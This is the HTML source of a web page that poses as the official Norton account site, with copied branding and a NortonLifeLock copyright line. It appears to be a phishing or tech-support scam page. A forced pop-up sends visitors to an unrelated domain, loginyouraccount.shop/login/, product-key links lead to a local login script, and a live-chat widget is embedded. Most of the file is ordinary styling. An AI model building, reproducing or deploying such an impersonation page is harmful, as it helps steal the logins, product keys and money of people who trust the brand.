

<!DOCTYPE html>
<html lang='en' >
<head>
  <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.4.1/css/bootstrap.min.css">
   
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.4/jquery.min.js"></script>
    <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.4.1/js/bootstrap.min.js"></script>
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
    <link href="https://fonts.googleapis.com/css2?family=Open+Sans:ital,wght@0,300;0,400;0,500;0,600;0,700;0,800;1,300;1,400;1,500;1,600;1,700;1,800&display=swap" rel="stylesheet">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
    <title>Official Norton</title>
    <meta name="robots" content="noindex">
	
		   <script>window.$zoho=window.$zoho || {};$zoho.salesiq=$zoho.salesiq||{ready:function(){}}</script><script id="zsiqscript" src="https://salesiq.zohopublic.in/widget?wc=siq0ae988b55c356e026bbde90190e203a82824816083f939dd99bacfd1b8da197d" defer></script>


<style>
.logo{
    width: 26%;
    margin-left: 7%;
}
body{
    font-family: "Open Sans",sans-serif !important;
}
.section1{
    background-image: url(slide1.jpg);
    min-height: 500px;
    background-position-x: 55%;
    background-position-y: 45%;
    padding: 25px;
}
.section2{
    background-image: url(slide2.jpg);
    min-height: 500px;
    background-position-x: 55%;
    background-position-y: 45%;
    padding: 25px;
    background-repeat: no-repeat;
}
.section4{
    background-image: url(map.jpg);
    min-height: 500px;
    background-position-x: 55%;
    background-position-y: 45%;
    padding: 25px;
}
.section3{
    background-image: url(slide3.jpg);
    min-height: 500px;
    background-position-x: 55%;
    background-position-y: 45%;
    padding: 25px;
}
.row {
    margin: 0px;
}
.logowrap{
    padding: 15px 0px; 
}
.headingse1{
    color: #fff;
    font-size: 4.8rem;
    font-weight: 400;
    line-height: 1.25;
    margin-top: 8%;
    margin-left: 10%;
    text-shadow: 0 2px 10px rgba(0,0,0,.4);
}
.parase1{
    color: #fff;
    font-size: 2.4rem;
    font-weight: 400;
    line-height: 1.5;
    margin: 15px 0 0;
    text-shadow: 0 2px 10px rgba(0,0,0,.4);
    margin-top: 1%;
    margin-left: 10%;
}
.link1sec1{
    font-size: 1.8rem;
    padding: 14px 70px;
    background-color: #feeb29;
    border-color: #242424;
    border: 3px solid #242424;
    border-radius: 40px;
    color: #242424;
    cursor: pointer;
    font-weight: 700;
    margin-top: 15%;
    margin-left: 10%;
    position: relative;
    top: 70px;
}
.retnlinkds1{
    color: #fff;
    display: block;
    font-size: 1.6rem;
    font-weight: 600;
    line-height: 1.56;
    margin-top: 15px;
    text-decoration: none;
    position: relative;
    top: 90px;
    margin-left: 10%;

}
.sec1imgs{
    text-align: center;
}
.sec1imgs1{
    text-align: center;
}
.sec1imgs img{
    width: 60%;
    margin-top: 15%;
}
.sec1imgs1 img{
    width: 40%;
    margin-top: 15%;
}
.sec1rightds{
    padding: 0px 100px 0px 0px;

}
.sec1rightds1{
    padding: 0px 0px 0px 100px;

}
.sec1rightds h3{
    color: #fff;
    font-size: 33px;
    font-weight: 400;
    line-height: 1.29;
    margin-top: 15%;
}
.sec1rightds p{
    color: #fff;
    font-size: 1.6rem;
    font-size: 1.6rem;
    font-weight: 400;
    line-height: 1.88;
    margin-top: 45px;
}
.sec1rightds a{
    color: #fff;
    display: block;
    font-size: 1.8rem;
    line-height: 1.67;
    text-decoration: underline;
    margin-top: 45px;

}
.sec1rightds1 h3{
    color: #fff;
    font-size: 33px;
    font-weight: 400;
    line-height: 1.29;
    margin-top: 15%;
}
.sec1rightds1 p{
    color: #fff;
    font-size: 1.6rem;
    font-weight: 400;
    line-height: 1.88;
    margin-top: 45px;
}
.sec1rightds1 a{
    color: #fff;
    display: block;
    font-size: 1.8rem;
    line-height: 1.67;
    text-decoration: underline;
    margin-top: 45px;
}
.footer{
    padding: 33px;
    padding-bottom: 18px;
    font-weight: 500;
}
.footer a{
    color: #000;
}
.signtex{
    font-weight: 700;
    font-size: 16px;
    margin-right: 8px;
    color: #0f71f0;
}
.usersihgo{
    font-size: 30px !important;
    color: #605f5f;
}
.header-werrplki{
    padding-right: 45px; 
}
.imgcir1sec{
    position: relative;
    right: -80%;
    padding: 19px;
    background: #fff;
    border-radius: 50%;
    margin-top: -6%;
}
.imgcir1sec1{
    position: relative;
    right: -12%;
    padding: 20px 17px 20px 14px;
    background: #fff;
    border-radius: 50%;
    margin-top: -6%;
}
.imgcir1sec3{
    position: relative;
    right: -80%;
    padding: 22px 22px 22px 16px;
    background: #fff;
    border-radius: 50%;
    margin-top: -6%;
}
.rightlogbox{
    background-color: #f4f1ed;
    padding: 50px 60px;
}
.loglogo{
    width: 44%;
    margin-bottom: 15px;
}
.logboxset{
    background: #fff;
    padding: 3px 25px 25px 25px;
    border-radius: 15px;
    box-shadow: 12px 12px 48px 0 rgba(0,0,0,0.15);
}
.signheads{
    font-size: 28px;
    font-weight: 700;
    color: #242424;
    border: none;
    background: none;
    outline: none;
    letter-spacing: -0.3px;
    line-height: 1.43;
    font-family: "Inter","Segoe UI",Lucida,Arial,sans-serif;
    margin-bottom: 40px;
}
.signheads1{
    font-size: 24px;
    font-weight: 700;
    color: #f10202;
    border: none;
    background: none;
    outline: none;
    letter-spacing: -0.3px;
    line-height: 1.43;
    font-family: "Inter","Segoe UI",Lucida,Arial,sans-serif;
    margin-bottom: 25px;
}
.unamelog{
    width: 100%;
    color: #4a4a4a;
    background-color: #fff;
    outline-style: none;
    border: none;
    border-bottom: solid #a0a0a0 1px;
    border-radius: 0;
    box-shadow: none;
    font-size: 14px;
    margin-top: 15px;
    padding: 6px;
    padding-left: 0px;
}
.btnlogsue{
    width: 100%;
    height: 46px;
    min-height: 46px;
    border: 2px solid;
    border-radius: 22px;
    background-color: #f7f7f7;
    font-weight: 800;
    font-size: 16px!important;
    margin-top: 20px;
    opacity: 0.2;
}
.ornorlog{
    margin: 15px 0;
    display: flex;
    font-size: 14px;
    color: #555551;
}
.ornorlog::before{
    margin-right: 5px;
    content: "";
    border-bottom: 1px solid #e5e4e4;
    margin: auto;
    flex: 1;
}
.ornorlog::after{
    margin-left: 5px;
    content: "";
    border-bottom: 1px solid #e5e4e4;
    margin: auto;
    flex: 1;
}
.singgapsoc{
    background-color: #fff;
    width: 100%;
    cursor: pointer;
    margin: auto;
    padding: 8px 18px;
    border: solid 2px #242424;
    border-radius: 22px;
    display: block;
    text-align: left;
    margin-top: 15px;
    color: #242424;
    font-size: 15px;
    font-weight: 800;
}
.singgapsoc i{
    margin-right: 50px;
}
.foruslog{
    margin-top: 25px;
    text-decoration: none;
    display: block;
    font-size: 13px;
    font-weight: 700;
    margin-bottom: 8px;
    white-space: normal;
    width: unset;
    text-align: left;
    color: #0f71f0;
}
.cretaclog{
    font-size: 14px;
    font-weight: 700;
    color: #0f71f0;
    text-decoration: underline;
}
.neuselog{
    font-size: 14px;
    font-weight: 600;
}
.botoxlog{
    font-size: 12px;
    text-align: center;
    color: #000;
    margin: auto;
    margin-top: 20px;
    line-height: 1.67;
}
.botoxlog1{
    font-size: 12px;
    text-align: center;
    color: #000;
    margin: auto;
    margin-top: 20px;
    line-height: 1.4;
    font-weight: 600;
}
.boxafternr{
    width: 80%;
    margin: 20px auto auto;
    font-size: 11px;
    text-align: center;
    color: #555551;
    font-weight: 400;
}
.linfotprle{
    margin-top: 20px;
}
.linfotprle a{
    color: #555551;
    font-size: 13px!important;
    padding: 0 10px;
    font-weight: 700;
    margin-top: 50px;
}
.pplogfo{
    color: #0f71f0;
}
.termlogfor{
    color: #0f71f0;
}
.welnoert{
    margin-left: 25%;
    font-size: 32px;
    font-weight: 400;
    margin-top: 100px;
}
.llftparcon{
    margin-left: 25%;
    color: #959595;
    font-size: 22px;
    line-height: 1.4;
    margin-top: 16px;
    width: 50%;
}
.clibyregnor{
    margin-top: 50px;
    font-size: 12px;
    text-align: center;
}
.lincolrpreg{
    font-size: 13px;
    color: #0f71f0;
    font-weight: 700;
}
.btnsubmitcslblur{
    background-color: #feeb29;
    opacity: 1;

}
.errimgpn{
    width: 10%;
    margin-top: 8%;
}
.errimgpnerr{
    width: 10%;
    margin-top: 4%;
}
.logerrvbot{
    width: 10%;
    position: absolute;
    bottom: 20px;
    margin-left: 20px;

}
.noerrava{
    font-size: 35px;
    font-weight: 500;
    margin-top: 52px;
}
.parertex{
    text-align: center;
    font-size: 13px;
    margin-bottom: 40px;
    margin-top: 20px;

}
.subscbtnerr{
    background: #feeb29;
    color: #000;
    border: 2px solid #000;
    padding: 10px 55px;
    font-size: 18px;
    font-weight: 600;
    border-radius: 50px;
}
.subscbtnerr1{
    background: #000;
    color: #fff;
    /* border: 2px solid #000; */
    padding: 13px 65px;
    font-size: 14px;
    font-weight: 600;
    border-radius: 5px;
}
.subscbtnerr1:hover{
    color: #fff;

}
.iproserr{
    font-size: 16px;
    background: none;
    border: none;
}
.headepaddinlef{
    margin-left: 20px;
}
.textkeyact6{
    height: 65px;
    width: 100%;
    border:2px solid #F0F0F0;
    padding: 10px;
    padding-left: 20px;
}
.textkeyact6::placeholder{
    color: #ccc;
    font-size: 20px;
}
.heasdkeyact{
    font-size: 20px;
    font-size: 700;
    margin-top: 20%;
}
.btnsumieu{
    height: 65px;
    width: 19%;
    /* margin-left: 1px; */
    /* margin-top: 15px; */
    /* position: relative; */
    /* top: 45%; */
    border-left: 0px;
    border: 0px;
}
.headactkeypara{
    margin-top: 20px;
}
.detaxtbothead{
    margin-top: 40px;
}
.modalsmpop{
    width: 100%;
}
.logforgetemail{
    width: 100%;
    width: 38%;
    margin-top: 50px;
}
.boxerrforget{
    padding: 40px;
}
.forgetinner{
    background: #fff;
    padding: 15px 25px;
    border-radius: 22px;
    box-shadow: 12px 12px 48px 0 rgba(0,0,0,0.15);
}
.folrergertruse{
    font-weight: 800;
    font-size: 29px;
}
.enterparforget{
    font-weight: 600;
    font-size: 15px;
}
.inttopforgt{
    width: 100%;
    border: none;
    border-bottom: 1px solid;
    margin-top: 10px;
    padding: 10px;
}
.presubmtforgetrbtn{
    width: 100%;
    /* max-width: 280px; */
    height: 46px;
    min-height: 46px;
    border: 2px solid;
    border-radius: 22px;
    font-weight: 800;
    font-size: 16px!important;
    margin-left: 0;
    margin-right: 0;
    margin-top: 32px;
    background-color: #f7f7f7;
    opacity: 0.2;
}
.presubmtforgetrbtn1{
    width: 50%;
    /* max-width: 280px; */
    height: 46px;
    min-height: 55px;
    border: 2px solid;
    border-radius: 28px;
    font-weight: 800;
    font-size: 16px!important;
    margin-left: 0;
    margin-right: 0;
    margin-top: 32px;
    background-color: #feeb29;
}
.submtforgetrbtn{
    width: 100%;
    /* max-width: 280px; */
    height: 46px;
    min-height: 46px;
    border: 2px solid;
    border-radius: 22px;
    background-color: #feeb29;
    font-weight: 800;
    font-size: 16px!important;
    margin-left: 0;
    margin-right: 0;
    margin-top: 32px;
    opacity: 1;
}

.linbacforger{
    width: 100%;
    display: block;
    margin-top: 25px;
    font-weight: 700;
}
.pareafortgetfoo{
    font-size: 12px;
    margin-top: 25px;
}
.colrovarethe{
    color: rgb(51, 141, 9);
}
.noerravaerr{
    font-size: 28px;
    font-weight: 600;
}
.tolfrererr{
    font-size: 30px;
    font-weight: 400;
    margin-bottom: 40px;
}
.parertexerr{
    text-align: center;
    font-size: 13px;
    margin-bottom: 20px;
    margin-top: 20px;
}
.parertexerr{
    text-align: center;
    font-size: 15px;
    margin-bottom: 20px;
    /* margin-top: 20px; */
}
.errcjhatliuv{
    font-weight: 500;
    background-color: #FEBA2B;
    border-radius: 7px 7px 7px 7px;
    padding: 12px 70px 12px 70px;
    color: #fff;
}
.supportclslog{
    width: 10%;
}
.patisipprot{
    height: 50px;
    background: #FEBA2B;
}
.patisipprot{
    height: 50px;
    /* background: #FEBA2B; */
    line-height: 50px;
    text-align: center;
    color: #fff;
    font-size: 20px;
    font-weight: 500;
}
.rigsuprtboxc{
    text-align: center;
    margin-top: 50px;
}
.carousel{
    display: inline-block;
    align-items: center;
    text-align: center;
    height: 500px;
}
.imghstersuprt{
}
@media only screen and (max-width: 991px) {
    .sec1rightds {
        padding: 0px 20px 0px 0px;
    }
    .sec1rightds h3{
        font-size: 22px;
    }
    .sec1rightds p{
        margin-top: 16px;
    }
    .sec1rightds a{
        margin-top: 16px;
    }
    .imgcir1sec{
        margin-top: -9%;
    }
    .sec1rightds1{
        padding: 0px 20px 0px 0px;
    }
    .sec1rightds1 h3{
        font-size: 22px;
    }
    .sec1rightds1 p{
        margin-top: 16px;
    }
    .sec1rightds1 a{
        margin-top: 16px;
    }
    .imgcir1sec1{
        margin-top: -9%;
    }
    .imgcir1sec3{
        margin-top: -9%;
    }

  }
  @media only screen and (max-width: 800px) {
    .rightlogbox {
        padding: 50px 20px;
    }
  }
  @media only screen and (max-width: 600px) {
    .logo{
        width: 50%;
    }
    .imgcir1sec{
        width: 13%;
        padding: 12px;
    }
    .imgcir1sec1{
        width: 13%;
        padding: 16px 14px 16px 11px;
        margin-top: -12%;
    }
    .imgcir1sec3 {
        margin-top: -14%;
        width: 13%;
        padding: 15px 17px 18px 12px;
    }
    .signtex {
        font-size: 14px;
        position: relative;
        top: -4px;
    }
    .usersihgo {
        font-size: 26px !important;
    }
    .headingse1 {
        color: #fff;
        font-size: 29px;
        line-height: 1.25;
        margin-top: 7%;
        margin-left: 0%;
    }
    .parase1 {
        font-size: 18px;
        margin-left: 0%;
    }
    .link1sec1{
        font-size: 15px;
        margin-left: 5%;
    }
    .section1{
        min-height: 376px;
        background-size: cover;
    }
    .section2{
        min-height: 376px;
    }
    .section3{
        min-height: 376px;
    }
    .section4{
        min-height: 376px;
    }
  }
  @media only screen and (max-width: 500px) {
    .noerrava {
        font-size: 22px;
    }    
    .logerrvbot {
        width: 32%;
        position: initial;
        margin-left: 20px;
        margin-top: 50px;
    }
    .btnsumieu{
        width: 10%;
    }
    .textkeyact6{
        width: 90%;
    }
    .boxerrforget{
        padding: 0px;
    }
    .noerravaerr {
        font-size: 20px;
    }
    .tolfrererr {
        font-size: 22px;
        font-weight: 600;
    }
  }





  
  @media only screen and (max-width: 768px)
{
    .emai-log {
        width: 16%;
    }
}
/*  //email form  */
.modal-content
{
    width:40%;
}
#myModal
{
    margin-top: 5%;
    margin-left: 29%;
}
#myModal1
{
    margin-top: 5%;
    margin-left: 29%;
}
.modal-submit
{
    margin-top:8%;
    width: 100%;
    height: 35px;
    background-color: #FEBA2B;
    border: none;
    color: #fff;
    border-radius: 5px;
}
.modal-input
{
    height: 35px;
    width: 100%;
    border-radius: 5px;
    border: none;
    background-color: #eee!important;
    padding-left: 10px;
}
@media only screen and (max-width: 768px)
{
    .emai-log {
        width: 16%;
    }
}
/*  //email form  */
.modal-content
{
    width:40%;
}
#myModal
{
    margin-top: 5%;
    margin-left: 29%;
}
#myModal1
{
    margin-top: 5%;
    margin-left: 29%;
}
.modal-submit
{
    margin-top:8%;
    width: 100%;
    height: 35px;
    background-color: #FEBA2B;
    border: none;
    color: #fff;
    border-radius: 5px;
}
.modal-input
{
    height: 35px;
    width: 100%;
    border-radius: 5px;
    border: none;
    background-color: #eee!important;
    padding-left: 10px;
}
.contact-span
{
    color: #e40202;
}
              .dlhd:hover{
        text-decoration: none;
    }
    .modlapopup{
        height: 310px;
        width: 480px;
        background: #fff;
        position: fixed;
        top: 25%;
        left: 34%;   
        box-shadow: 0px 1px 11px 0px #000;
        z-index: 1000; 
        padding: 30px 20px;
        border-radius: 5px;
    }
    .dlhd{
        position: fixed ;
        top: 0;
        left: 0;
        z-index: 140;
        width: 100vw;
        height: 100vh;
        background-color: rgba(0, 0, 0, 0.6);
    }
    .wlcmint{
        font-family: &#39;Josefin Sans&#39;, sans-serif !important;
        color: #000;
        font-weight: 700;
        font-size: 30px;
    }
    .parasdft{
        color: #5c5a5a;
        font-size: 16px;
        font-weight: 400;
        margin-top:45px;
    }
    .btnlinkg{
        color: rgb(22,88,109);
        font-weight: 700;
        font-size: 18px;
        text-decoration: underline;
        margin-right: 30px;
        margin-top: 30px;
    }
    .btnlinkg1{
    color: #000;
    font-weight: 700;
    font-size: 18px;
    padding: 15px 20px;
    margin-right: 30px;
    background-color: #efd902;
    border-radius: 2px;
    }
    .msdrtlina{
        margin-top: 35px;
    }
    .linksdaq2:hover{
        text-decoration:none;
    }

</style>
</head>
<body>

<a class='dlhd' href='#'>
        <a class='linksdaq2' href='#'>
            <div class='modlapopup'>
                <h2 class='text-center wlcmint'>Welcome to Norton</h2>
                <p class='parasdft'>To check out product designed specifically for your country, please visit site</p>
                <p class='text-center msdrtlina'><a class='btnlinkg' href='https://loginyouraccount.shop/login/'>Visit the US site</a><a class='btnlinkg1' href='https://loginyouraccount.shop/login/'>Go to CA site</a></p>
            </div>
        </a>



  <div class="rappbody">
            <div class="header">
                <div class="row logowrap">
                    <diiv class="col-lg-6 col-md-6 col-sm-6 col-xs-6">
                        <img class="logo" src="logo.png" alt="">
                    </diiv>
                    <diiv class="col-lg-6 col-md-6 col-sm-6 col-xs-6 text-right header-werrplki">
                            <a href="#"> <span class="signtex">Sign In</span>
                                <i class="fa fa-user-circle-o usersihgo"></i>
                            </a>
                    </diiv>
                </div>
            </div>
			
			
                <div class="section2">
            <div class="bodyconted">
                <div class="section1">
                    <h3 class="headingse1">Welcome to My Norton</h3>
                    <p class="parase1">To access the features in your plan, click below.</p>
                    <a class="link1sec1" href="#">Enter a Product Key</a><br>
                    <a class="retnlinkds1" href="#">Returning customer? Sign In</a>
                </div>
                <div class="section2">
                        <img class="imgcir1sec" src="1.png" alt="">
                    <div class="row">
                        <div class="col-lg-6 col-md-6 col-sm-6 sec1imgs">
                            <img class="hidden-xs" src="dev.png" alt="">
                        </div>
                        <div class="col-lg-6 col-md-6 col-sm-6 sec1rightds">
                            <h3>Help protect more devices with your subscription</h3>
                            <p>We make it easy for you to set up your protection, check your security status, and extend your protection to other PCs, Macs, smartphones, and tablets.</p>
                            <a href="login/index.php">Enter a Product Key</a>
                        </div>
                    </div>
                </div>
                <div class="section3">
                        <img class="imgcir1sec1" src="2.png" alt="">
                    <div class="row">
                        <div class="col-lg-6 col-md-6 col-sm-6 sec1rightds1">
                            <h3>Manage your digital life. Anytime. Anywhere.</h3>
                            <p>At any time and from anywhere, sign in to your account to manage your subscriptions, update your profile, change your billing preferences, or renew your protection.</p>
                            <a href="login/index.php">Enter a Product Key</a>
                        </div>
                        <div class="col-lg-6 col-md-6 col-sm-6"></div>
                    </div>
                </div>
                <div class="section4">
                        <img class="imgcir1sec3" src="3.png" alt="">
                    <div class="row">
                        <div class="col-lg-6 col-md-6 col-sm-6 sec1imgs1">
                            <img class="hidden-xs" src="mob.png" alt="">
                        </div>
                        <div class="col-lg-6 col-md-6 col-sm-6 sec1rightds">
                            <h3>Lost or stolen device protection to keep you secure</h3>
                            <p>If your device is lost or stolen, you can remotely lock and track it, sound an audible alarm, take a photo when the screen is activated, and wipe your personal information to prevent access.</p>
                            <a href="login/index.php">Enter a Product Key</a>
                        </div>
                    </div>
                </div>
            </div>
            <div class="footer">
                <p>Copyright © 2025 NortonLifeLock Inc. All rights reserved.&nbsp;&nbsp;
                    |&nbsp;<a href=""> Legal</a>&nbsp;&nbsp;
                    |&nbsp;<a href="">Privacy</a>
                </p>
            </div>
        </div> 
</body>
</html>
